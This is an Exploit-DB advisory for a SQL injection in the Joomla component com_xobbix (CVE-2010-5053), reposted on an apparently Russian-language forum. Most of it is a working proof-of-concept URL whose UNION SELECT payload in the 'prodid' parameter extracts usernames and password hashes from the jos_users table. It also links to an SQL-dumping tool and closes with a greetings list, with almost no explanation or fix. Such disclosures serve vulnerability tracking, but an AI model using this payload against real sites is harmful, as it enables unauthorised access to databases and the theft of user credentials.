- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12097
- Проверка EDB
-
- Пройдено
- Автор
- ANTISECURITY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-5053
- Дата публикации
- 2010-04-06
Код:
===============================================================================================================
[o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Software : com_xobbix version 1.0.x
Vendor : http://www.php-shop-system.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
===============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25
[o] PoC
http://localhost/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[o] Tool
Simple SQLi Dumper v5.1
http://c0li.info/xpl/ssdp51.tar.gz
http://evilc0de.blogspot.com/2010/03/simple-sqli-dumper-v51-how-to.html
===============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
===============================================================================================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia- Источник
- www.exploit-db.com
